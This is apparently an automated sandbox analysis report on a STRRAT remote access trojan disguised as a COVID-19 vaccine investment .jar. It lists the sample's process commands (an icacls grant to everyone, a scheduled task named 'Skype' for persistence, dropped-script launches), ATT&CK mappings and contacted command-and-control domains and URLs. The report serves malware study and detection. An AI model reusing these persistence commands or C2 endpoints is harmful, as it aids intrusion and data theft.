            Source: java.exe, 00000006.00000003.203419915.0000000014C60000.00000004.00000001.sdmpBinary or memory string: org/omg/CORBA/OMGVMCID.classPK
            Source: java.exe, 00000006.00000003.203419915.0000000014C60000.00000004.00000001.sdmpBinary or memory string: java/lang/VirtualMachineError.classPK
            Source: java.exe, 00000006.00000002.207991849.0000000014FD0000.00000002.00000001.sdmp, wscript.exe, 0000000A.00000002.220344385.0000000005AB0000.00000002.00000001.sdmp, javaw.exe, 0000000B.00000002.242535927.00000000156C0000.00000002.00000001.sdmp, java.exe, 0000000D.00000002.256904173.0000000015870000.00000002.00000001.sdmp, java.exe, 00000010.00000002.531541742.0000000015FF0000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
            Source: java.exe, 00000006.00000002.207991849.0000000014FD0000.00000002.00000001.sdmp, wscript.exe, 0000000A.00000002.220344385.0000000005AB0000.00000002.00000001.sdmp, javaw.exe, 0000000B.00000002.242535927.00000000156C0000.00000002.00000001.sdmp, java.exe, 0000000D.00000002.256904173.0000000015870000.00000002.00000001.sdmp, java.exe, 00000010.00000002.531541742.0000000015FF0000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
            Source: java.exe, 00000006.00000002.206791495.0000000000ADB000.00000004.00000020.sdmp, javaw.exe, 0000000B.00000002.236307282.0000000000F08000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: java.exe, 00000006.00000002.207991849.0000000014FD0000.00000002.00000001.sdmp, wscript.exe, 0000000A.00000002.220344385.0000000005AB0000.00000002.00000001.sdmp, javaw.exe, 0000000B.00000002.242535927.00000000156C0000.00000002.00000001.sdmp, java.exe, 0000000D.00000002.256904173.0000000015870000.00000002.00000001.sdmp, java.exe, 00000010.00000002.531541742.0000000015FF0000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
            Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_885250\java.exeMemory protected: page read and write | page guard
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\7za.exe 7za.exe x -y -oC:\jar 'C:\Users\user\Desktop\Covid19_Vacine_Investment_Proposals_1st_Quarter2021 pdf.jar'
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_885250\java.exe java.exe -jar 'C:\Users\user\Desktop\Covid19_Vacine_Investment_Proposals_1st_Quarter2021 pdf.jar' keuqzwqbvn.Mmwwrnygnfl
            Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_885250\java.exeProcess created: C:\Windows\SysWOW64\icacls.exe C:\Windows\system32\icacls.exe C:\ProgramData\Oracle\Java\.oracle_jre_usage /grant 'everyone':(OI)(CI)M
            Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_885250\java.exeProcess created: C:\Windows\SysWOW64\wscript.exe wscript C:\Users\user\fukvowbkrs.js
            Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe 'C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe' -jar 'C:\Users\user\AppData\Roaming\vmlpusjwhz.txt'
            Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exeProcess created: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe 'C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe' -jar 'C:\Users\user\vmlpusjwhz.txt'
            Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c schtasks /create /sc minute /mo 30 /tn Skype /tr 'C:\Users\user\AppData\Roaming\vmlpusjwhz.txt'
            Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exeProcess created: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe 'C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe' -jar 'C:\Users\user\AppData\Roaming\vmlpusjwhz.txt'
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /sc minute /mo 30 /tn Skype /tr 'C:\Users\user\AppData\Roaming\vmlpusjwhz.txt'
            Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exeProcess created: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe 'C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe' -jar 'C:\Users\user\AppData\Roaming\plugins.jar' mp
            Source: java.exe, 00000010.00000002.511334653.0000000001070000.00000002.00000001.sdmp, notepad.exe, 00000015.00000002.512497714.0000014F58C60000.00000002.00000001.sdmpBinary or memory string: Program Manager
            Source: java.exe, 00000010.00000002.511334653.0000000001070000.00000002.00000001.sdmp, notepad.exe, 00000015.00000002.512497714.0000014F58C60000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
            Source: java.exe, 00000010.00000002.511334653.0000000001070000.00000002.00000001.sdmp, notepad.exe, 00000015.00000002.512497714.0000014F58C60000.00000002.00000001.sdmpBinary or memory string: Progman
            Source: java.exe, 00000010.00000002.511334653.0000000001070000.00000002.00000001.sdmp, notepad.exe, 00000015.00000002.512497714.0000014F58C60000.00000002.00000001.sdmpBinary or memory string: Progmanlock
            Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_885250\java.exeCode function: 6_2_02770380 cpuid
            Source: C:\Windows\SysWOW64\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\JavaSoft\Java Runtime Environment CurrentVersion
            Source: C:\Windows\SysWOW64\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\JavaSoft\Java Runtime Environment CurrentVersion
            Source: C:\Windows\System32\notepad.exeQueries volume information: C:\Users\user\AppData\Roaming\vmlpusjwhz.txt VolumeInformation
            Source: C:\Windows\System32\notepad.exeQueries volume information: C:\Users\user\AppData\Roaming\vmlpusjwhz.txt VolumeInformation
            Source: C:\Windows\System32\notepad.exeQueries volume information: C:\Users\user\AppData\Roaming\vmlpusjwhz.txt VolumeInformation
            Source: C:\Windows\System32\notepad.exeQueries volume information: C:\Users\user\AppData\Roaming\vmlpusjwhz.txt VolumeInformation
            Source: C:\Windows\SysWOW64\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

            Stealing of Sensitive Information:

            barindex
            Yara detected STRRATShow sources
            Source: Yara matchFile source: 00000018.00000002.521334832.000000000A810000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000010.00000002.519763899.0000000004ECD000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000010.00000002.517894566.0000000004DCD000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000018.00000002.517833863.000000000543D000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000D.00000002.252958465.0000000005427000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000D.00000002.252569519.00000000051C5000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: java.exe PID: 720, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: java.exe PID: 4952, type: MEMORY

            Remote Access Functionality:

            barindex
            Yara detected STRRATShow sources
            Source: Yara matchFile source: 00000018.00000002.521334832.000000000A810000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000010.00000002.519763899.0000000004ECD000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000010.00000002.517894566.0000000004DCD000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000018.00000002.517833863.000000000543D000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000D.00000002.252958465.0000000005427000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000D.00000002.252569519.00000000051C5000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: java.exe PID: 720, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: java.exe PID: 4952, type: MEMORY

            Mitre Att&ck Matrix

            Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
            Valid AccountsCommand and Scripting Interpreter2Startup Items1Startup Items1Masquerading1OS Credential DumpingQuery Registry1Remote ServicesData from Local SystemExfiltration Over Other Network MediumWeb Service1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
            Default AccountsScheduled Task/Job1Scheduled Task/Job1Process Injection12Virtualization/Sandbox Evasion1LSASS MemorySecurity Software Discovery11Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothEncrypted Channel2Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
            Domain AccountsScripting1Registry Run Keys / Startup Folder221Scheduled Task/Job1Disable or Modify Tools1Security Account ManagerVirtualization/Sandbox Evasion1SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Standard Port1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
            Local AccountsExploitation for Client Execution2Services File Permissions Weakness1Registry Run Keys / Startup Folder221Process Injection12NTDSProcess Discovery1Distributed Component Object ModelInput CaptureScheduled TransferNon-Application Layer Protocol1SIM Card SwapCarrier Billing Fraud
            Cloud AccountsCronNetwork Logon ScriptServices File Permissions Weakness1Scripting1LSA SecretsRemote System Discovery1SSHKeyloggingData Transfer Size LimitsApplication Layer Protocol12Manipulate Device CommunicationManipulate App Store Rankings or Ratings
            Replication Through Removable MediaLaunchdRc.commonRc.commonObfuscated Files or Information1Cached Domain CredentialsFile and Directory Discovery1VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
            External Remote ServicesScheduled TaskStartup ItemsStartup ItemsServices File Permissions Weakness1DCSyncSystem Information Discovery32Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 356987 Sample: Covid19_Vacine_Investment_P... Startdate: 23/02/2021 Architecture: WINDOWS Score: 80 74 strizzz100.duckdns.org 2->74 89 Yara detected STRRAT 2->89 91 Connects to a pastebin service (likely for C&C) 2->91 93 Uses dynamic DNS services 2->93 95 3 other signatures 2->95 12 cmd.exe 2 2->12         started        14 cmd.exe 1 2->14         started        16 notepad.exe 2->16         started        18 5 other processes 2->18 signatures3 process4 process5 20 java.exe 6 12->20         started        23 conhost.exe 12->23         started        25 java.exe 14->25         started        29 7za.exe 9 14->29         started        31 conhost.exe 14->31         started        dnsIp6 97 Exploit detected, runtime environment starts unknown processes 20->97 33 wscript.exe 2 20->33         started        35 icacls.exe 1 20->35         started        83 pluginserver.duckdns.org 23.239.31.129, 54557 LINODE-APLinodeLLCUS United States 25->83 85 str-master.pw 25->85 87 2 other IPs or domains 25->87 64 C:\Users\user\...\jna8178706811767784369.dll, PE32 25->64 dropped 99 Creates autostart registry keys to launch java 25->99 101 Creates multiple autostart registry keys 25->101 37 conhost.exe 25->37         started        file7 signatures8 process9 process10 39 javaw.exe 25 33->39         started        42 conhost.exe 35->42         started        dnsIp11 76 sonatype.map.fastly.net 199.232.192.209, 443, 49718, 49719 FASTLYUS United States 39->76 79 github.com 140.82.121.3, 443, 49721 GITHUBUS United States 39->79 81 3 other IPs or domains 39->81 44 java.exe 2 21 39->44         started        signatures12 103 Uses dynamic DNS services 76->103 process13 file14 66 C:\Users\user\AppData\...\vmlpusjwhz.txt, Zip 44->66 dropped 68 C:\Users\user\...\jna7235467147341798336.dll, PE32 44->68 dropped 105 Creates multiple autostart registry keys 44->105 48 java.exe 44->48         started        52 cmd.exe 44->52         started        54 conhost.exe 44->54         started        signatures15 process16 dnsIp17 70 strizzz100.duckdns.org 107.175.144.243, 1071, 4040 AS-COLOCROSSINGUS United States 48->70 72 str-master.pw 48->72 60 C:\Users\user\AppData\Roaming\plugins.jar, Zip 48->60 dropped 62 C:\Users\user\...\jna6181350368483245817.dll, PE32 48->62 dropped 56 conhost.exe 52->56         started        58 schtasks.exe 52->58         started        file18 process19

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.

            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            No Antivirus matches

            Dropped Files

            SourceDetectionScannerLabelLink
            C:\Users\user\AppData\Local\Temp\jna-99048687\jna6181350368483245817.dll3%MetadefenderBrowse
            C:\Users\user\AppData\Local\Temp\jna-99048687\jna6181350368483245817.dll0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\jna-99048687\jna7235467147341798336.dll3%MetadefenderBrowse
            C:\Users\user\AppData\Local\Temp\jna-99048687\jna7235467147341798336.dll0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\jna-99048687\jna8178706811767784369.dll3%MetadefenderBrowse
            C:\Users\user\AppData\Local\Temp\jna-99048687\jna8178706811767784369.dll0%ReversingLabs

            Unpacked PE Files

            No Antivirus matches

            Domains

            No Antivirus matches

            URLs

            SourceDetectionScannerLabelLink
            http://crl.xrampsecurity.com/XGCA.crl0%URL Reputationsafe
            http://crl.xrampsecurity.com/XGCA.crl0%URL Reputationsafe
            http://crl.xrampsecurity.com/XGCA.crl0%URL Reputationsafe
            http://crl.chambersign.org/chambersroot.crl00%URL Reputationsafe
            http://crl.chambersign.org/chambersroot.crl00%URL Reputationsafe
            http://crl.chambersign.org/chambersroot.crl00%URL Reputationsafe
            http://trustcenter-crl.certificat2.com/Keynectis/KEYNECTIS_ROOT_CA.crl00%URL Reputationsafe
            http://trustcenter-crl.certificat2.com/Keynectis/KEYNECTIS_ROOT_CA.crl00%URL Reputationsafe
            http://trustcenter-crl.certificat2.com/Keynectis/KEYNECTIS_ROOT_CA.crl00%URL Reputationsafe
            http://www.certplus.com/CRL/class2.crl0%URL Reputationsafe
            http://www.certplus.com/CRL/class2.crl0%URL Reputationsafe
            http://www.certplus.com/CRL/class2.crl0%URL Reputationsafe
            http://bugreport.sun.com/bugreport/0%Avira URL Cloudsafe
            http://cps.chambersign.org/cps/chambersroot.html00%URL Reputationsafe
            http://cps.chambersign.org/cps/chambersroot.html00%URL Reputationsafe
            http://cps.chambersign.org/cps/chambersroot.html00%URL Reputationsafe
            http://www.chambersign.org10%URL Reputationsafe
            http://www.chambersign.org10%URL Reputationsafe
            http://www.chambersign.org10%URL Reputationsafe
            https://github-releases.githubusercontent.com/51361554/623ef000-9da4-11e9-9ea2-d90155318994?X-Amz-Al0%Avira URL Cloudsafe
            http://str-master.pw/strigoi/server/ping.php0%Avira URL Cloudsafe
            http://jbfrost.live/strigoi/server/?hwid=1&lid=m&ht=50%Avira URL Cloudsafe
            http://ops.com.pa/jre7.zip0%Avira URL Cloudsafe
            https://ocsp.quovadisoffshore.com0%URL Reputationsafe
            https://ocsp.quovadisoffshore.com0%URL Reputationsafe
            https://ocsp.quovadisoffshore.com0%URL Reputationsafe
            http://crl.securetrust.com/STCA.crl00%URL Reputationsafe
            http://crl.securetrust.com/STCA.crl00%URL Reputationsafe
            http://crl.securetrust.com/STCA.crl00%URL Reputationsafe
            http://str-master.pw/strigoi/server/ping.php?lid=0%Avira URL Cloudsafe
            http://cps.chambersign.org/cps/chambersroot.html0%URL Reputationsafe
            http://cps.chambersign.org/cps/chambersroot.html0%URL Reputationsafe
            http://cps.chambersign.org/cps/chambersroot.html0%URL Reputationsafe
            http://www.certplus.com/CRL/class3P.crl0%URL Reputationsafe
            http://www.certplus.com/CRL/class3P.crl0%URL Reputationsafe
            http://www.certplus.com/CRL/class3P.crl0%URL Reputationsafe
            http://www.certplus.com/CRL/class3P.crl00%URL Reputationsafe
            http://www.certplus.com/CRL/class3P.crl00%URL Reputationsafe
            http://www.certplus.com/CRL/class3P.crl00%URL Reputationsafe
            http://crl.securetrust.com/STCA.crl0%URL Reputationsafe
            http://crl.securetrust.com/STCA.crl0%URL Reputationsafe
            http://crl.securetrust.com/STCA.crl0%URL Reputationsafe
            http://str-master.pw/strigoi/server/ping.php?0%Avira URL Cloudsafe
            http://www.certplus.com/CRL/class2.crl00%URL Reputationsafe
            http://www.certplus.com/CRL/class2.crl00%URL Reputationsafe
            http://www.certplus.com/CRL/class2.crl00%URL Reputationsafe
            http://crl.xrampsecurity.com/XGCA.crl00%URL Reputationsafe
            http://crl.xrampsecurity.com/XGCA.crl00%URL Reputationsafe
            http://crl.xrampsecurity.com/XGCA.crl00%URL Reputationsafe
            http://trustcenter-crl.certificat2.com/Keynectis/KEYNECTIS_ROOT_CA.crl0%URL Reputationsafe
            http://trustcenter-crl.certificat2.com/Keynectis/KEYNECTIS_ROOT_CA.crl0%URL Reputationsafe
            http://trustcenter-crl.certificat2.com/Keynectis/KEYNECTIS_ROOT_CA.crl0%URL Reputationsafe
            http://www.quovadis.bm0%URL Reputationsafe
            http://www.quovadis.bm0%URL Reputationsafe
            http://www.quovadis.bm0%URL Reputationsafe
            http://www.quovadis.bm00%URL Reputationsafe
            http://www.quovadis.bm00%URL Reputationsafe
            http://www.quovadis.bm00%URL Reputationsafe
            https://ocsp.quovadisoffshore.com00%URL Reputationsafe
            https://ocsp.quovadisoffshore.com00%URL Reputationsafe
            https://ocsp.quovadisoffshore.com00%URL Reputationsafe
            http://www.allatori.com0%URL Reputationsafe
            http://www.allatori.com0%URL Reputationsafe
            http://www.allatori.com0%URL Reputationsafe
            http://crl.chambersign.org/chambersroot.crlC50%Avira URL Cloudsafe
            http://str-master.pw0%Avira URL Cloudsafe
            http://crl.chambersign.org/chambersroot.crl0%URL Reputationsafe
            http://crl.chambersign.org/chambersroot.crl0%URL Reputationsafe
            http://crl.chambersign.org/chambersroot.crl0%URL Reputationsafe
            http://www.chambersign.org0%URL Reputationsafe
            http://www.chambersign.org0%URL Reputationsafe
            http://www.chambersign.org0%URL Reputationsafe
            http://policy.camerfirma.com00%URL Reputationsafe
            http://policy.camerfirma.com00%URL Reputationsafe
            http://policy.camerfirma.com00%URL Reputationsafe
            http://str-master.pw/strigoi/server/ping.php?lid=RUGR-ATSN-D14P-VBXX-49LW0%Avira URL Cloudsafe

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            pluginserver.duckdns.org
            		23.239.31.129
            		truetrue
              		unknown
              sonatype.map.fastly.net
              		199.232.192.209
              		truefalse
                		unknown
                github.com
                		140.82.121.3
                		truefalse
                  		high
                  strizzz100.duckdns.org
                  		107.175.144.243
                  		truetrue
                    		unknown
                    github-releases.githubusercontent.com
                    		185.199.108.154
                    		truefalse
                      		unknown
                      pastebin.com
                      		104.23.99.190
                      		truefalse
                        		high
                        str-master.pw
                        		unknown
                        		unknowntrue
                          		unknown
                          repo1.maven.org
                          		unknown
                          		unknownfalse
                            		high
                            jbfrost.live
                            		unknown
                            		unknowntrue
                              		unknown

                              URLs from Memory and Binaries

                              NameSourceMaliciousAntivirus DetectionReputation
                              http://crl.xrampsecurity.com/XGCA.crljavaw.exe, 0000000B.00000002.239749123.000000000A126000.00000004.00000001.sdmp, java.exe, 0000000D.00000002.253571843.000000000A727000.00000004.00000001.sdmp, java.exe, 00000010.00000002.521484537.000000000A126000.00000004.00000001.sdmpfalse
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              		unknown
                              https://repo1.maven.org/maven2/net/java/dev/jna/jna-platform/5.5.0/jna-platform-5.5.0.jarjavaw.exe, 0000000B.00000002.238456779.0000000009F50000.00000004.00000001.sdmp, java.exe, 0000000D.00000002.253150120.000000000A550000.00000004.00000001.sdmp, java.exe, 00000010.00000002.520395442.0000000009F50000.00000004.00000001.sdmpfalse
                                		high
                                http://crl.chambersign.org/chambersroot.crl0javaw.exe, 0000000B.00000002.239749123.000000000A126000.00000004.00000001.sdmp, java.exe, 0000000D.00000002.253093640.00000000054CE000.00000004.00000001.sdmp, java.exe, 00000010.00000002.521484537.000000000A126000.00000004.00000001.sdmpfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                		unknown
                                http://trustcenter-crl.certificat2.com/Keynectis/KEYNECTIS_ROOT_CA.crl0javaw.exe, 0000000B.00000002.242664932.000000001582F000.00000004.00000001.sdmp, java.exe, 0000000D.00000002.253093640.00000000054CE000.00000004.00000001.sdmp, java.exe, 00000010.00000002.521484537.000000000A126000.00000004.00000001.sdmpfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                		unknown
                                http://www.apache.org/licenses/LICENSE-2.0.txtjava.exe, 0000000D.00000003.248758362.0000000015676000.00000004.00000001.sdmp, java.exe, 00000010.00000003.277137784.0000000014FD2000.00000004.00000001.sdmpfalse
                                  		high
                                  http://www.apache.org/licenses/javaw.exe, 0000000B.00000002.240871910.000000000A2CE000.00000004.00000001.sdmpfalse
                                    		high
                                    http://www.certplus.com/CRL/class2.crljava.exe, 00000010.00000002.521484537.000000000A126000.00000004.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    		unknown
                                    http://bugreport.sun.com/bugreport/java.exe, 0000000D.00000002.252198805.0000000005052000.00000004.00000001.sdmp, java.exe, 00000010.00000002.520685745.0000000009F96000.00000004.00000001.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://cps.chambersign.org/cps/chambersroot.html0javaw.exe, 0000000B.00000002.239749123.000000000A126000.00000004.00000001.sdmp, java.exe, 0000000D.00000002.253093640.00000000054CE000.00000004.00000001.sdmp, java.exe, 00000010.00000002.521484537.000000000A126000.00000004.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    		unknown
                                    http://java.oracle.com/java.exe, 00000006.00000002.207053367.0000000004800000.00000004.00000001.sdmp, javaw.exe, 0000000B.00000002.238616990.0000000009FA2000.00000004.00000001.sdmp, java.exe, 0000000D.00000002.253246566.000000000A5A2000.00000004.00000001.sdmp, java.exe, 00000010.00000002.520749260.0000000009FA0000.00000004.00000001.sdmpfalse
                                      		high
                                      http://null.oracle.com/javaw.exe, 0000000B.00000003.228995438.00000000150EA000.00000004.00000001.sdmp, javaw.exe, 0000000B.00000002.239181413.000000000A03C000.00000004.00000001.sdmp, java.exe, 0000000D.00000003.248758362.0000000015676000.00000004.00000001.sdmp, java.exe, 0000000D.00000002.253348649.000000000A630000.00000004.00000001.sdmp, java.exe, 00000010.00000003.277137784.0000000014FD2000.00000004.00000001.sdmp, java.exe, 00000010.00000002.521112026.000000000A02F000.00000004.00000001.sdmpfalse
                                        		high
                                        http://www.chambersign.org1javaw.exe, 0000000B.00000002.239749123.000000000A126000.00000004.00000001.sdmp, java.exe, 0000000D.00000002.253093640.00000000054CE000.00000004.00000001.sdmp, java.exe, 00000010.00000002.521484537.000000000A126000.00000004.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        		unknown
                                        https://github-releases.githubusercontent.com/51361554/623ef000-9da4-11e9-9ea2-d90155318994?X-Amz-Aljavaw.exe, 0000000B.00000002.240730122.000000000A276000.00000004.00000001.sdmp, javaw.exe, 0000000B.00000002.238157882.0000000004EA7000.00000004.00000001.sdmp, javaw.exe, 0000000B.00000002.240964215.000000000A300000.00000004.00000001.sdmp, javaw.exe, 0000000B.00000002.240871910.000000000A2CE000.00000004.00000001.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://str-master.pw/strigoi/server/ping.phpjava.exe, 00000010.00000002.517809140.0000000004DC1000.00000004.00000001.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://repository.swisssign.com/0javaw.exe, 0000000B.00000002.239749123.000000000A126000.00000004.00000001.sdmp, java.exe, 0000000D.00000002.253093640.00000000054CE000.00000004.00000001.sdmp, java.exe, 00000010.00000002.521484537.000000000A126000.00000004.00000001.sdmpfalse
                                          		high
                                          https://repo1.maven.org/maven2/net/java/dev/jna/jna/5.5.0/jna-5.5.0.jarjavaw.exe, 0000000B.00000002.238456779.0000000009F50000.00000004.00000001.sdmp, javaw.exe, 0000000B.00000002.238481797.0000000009F6E000.00000004.00000001.sdmp, java.exe, 0000000D.00000002.253150120.000000000A550000.00000004.00000001.sdmp, java.exe, 00000010.00000002.520395442.0000000009F50000.00000004.00000001.sdmpfalse
                                            		high
                                            http://jbfrost.live/strigoi/server/?hwid=1&lid=m&ht=5java.exe, 00000010.00000002.515417464.0000000004BAB000.00000004.00000001.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://policy.camerfirma.comjava.exe, 00000010.00000002.521484537.000000000A126000.00000004.00000001.sdmpfalse
                                              		high
                                              http://ops.com.pa/jre7.zipwscript.exe, 0000000A.00000003.214763026.0000000004F0D000.00000004.00000001.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              https://ocsp.quovadisoffshore.comjava.exe, 00000010.00000002.521484537.000000000A126000.00000004.00000001.sdmpfalse
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              		unknown
                                              https://repo1.maven.org/maven2/org/xerial/sqlite-jdbc/3.14.2.1/sqlite-jdbc-3.14.2.1.jarjavaw.exe, 0000000B.00000002.238456779.0000000009F50000.00000004.00000001.sdmp, javaw.exe, 0000000B.00000002.237181358.0000000004A90000.00000004.00000001.sdmp, java.exe, 0000000D.00000002.253150120.000000000A550000.00000004.00000001.sdmp, java.exe, 00000010.00000002.520395442.0000000009F50000.00000004.00000001.sdmpfalse
                                                		high
                                                http://crl.securetrust.com/STCA.crl0javaw.exe, 0000000B.00000002.239749123.000000000A126000.00000004.00000001.sdmp, java.exe, 0000000D.00000002.253093640.00000000054CE000.00000004.00000001.sdmp, java.exe, 00000010.00000002.521484537.000000000A126000.00000004.00000001.sdmpfalse
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                		unknown
                                                http://str-master.pw/strigoi/server/ping.php?lid=java.exe, 00000010.00000002.517809140.0000000004DC1000.00000004.00000001.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://www.quovadisglobal.com/cpsjava.exe, 00000010.00000002.521484537.000000000A126000.00000004.00000001.sdmpfalse
                                                  		high
                                                  http://cps.chambersign.org/cps/chambersroot.htmljava.exe, 00000010.00000002.521484537.000000000A126000.00000004.00000001.sdmpfalse
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  		unknown
                                                  http://www.certplus.com/CRL/class3P.crljava.exe, 00000010.00000002.521484537.000000000A126000.00000004.00000001.sdmpfalse
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  		unknown
                                                  http://www.certplus.com/CRL/class3P.crl0javaw.exe, 0000000B.00000002.239749123.000000000A126000.00000004.00000001.sdmp, java.exe, 0000000D.00000002.253093640.00000000054CE000.00000004.00000001.sdmp, java.exe, 00000010.00000002.521484537.000000000A126000.00000004.00000001.sdmpfalse
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  		unknown
                                                  http://crl.securetrust.com/STCA.crljava.exe, 00000010.00000002.521484537.000000000A126000.00000004.00000001.sdmpfalse
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  		unknown
                                                  http://str-master.pw/strigoi/server/ping.php?java.exe, 00000010.00000002.517894566.0000000004DCD000.00000004.00000001.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.certplus.com/CRL/class2.crl0javaw.exe, 0000000B.00000002.242664932.000000001582F000.00000004.00000001.sdmp, java.exe, 0000000D.00000002.253093640.00000000054CE000.00000004.00000001.sdmp, java.exe, 00000010.00000002.521484537.000000000A126000.00000004.00000001.sdmpfalse
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  		unknown
                                                  http://www.quovadisglobal.com/cps0javaw.exe, 0000000B.00000002.239749123.000000000A126000.00000004.00000001.sdmp, java.exe, 0000000D.00000002.253093640.00000000054CE000.00000004.00000001.sdmp, java.exe, 00000010.00000002.521484537.000000000A126000.00000004.00000001.sdmpfalse
                                                    		high
                                                    http://crl.xrampsecurity.com/XGCA.crl0javaw.exe, 0000000B.00000002.239749123.000000000A126000.00000004.00000001.sdmp, java.exe, 0000000D.00000002.253093640.00000000054CE000.00000004.00000001.sdmp, java.exe, 00000010.00000002.521484537.000000000A126000.00000004.00000001.sdmpfalse
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    		unknown
                                                    http://trustcenter-crl.certificat2.com/Keynectis/KEYNECTIS_ROOT_CA.crljava.exe, 00000010.00000002.521484537.000000000A126000.00000004.00000001.sdmpfalse
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    		unknown
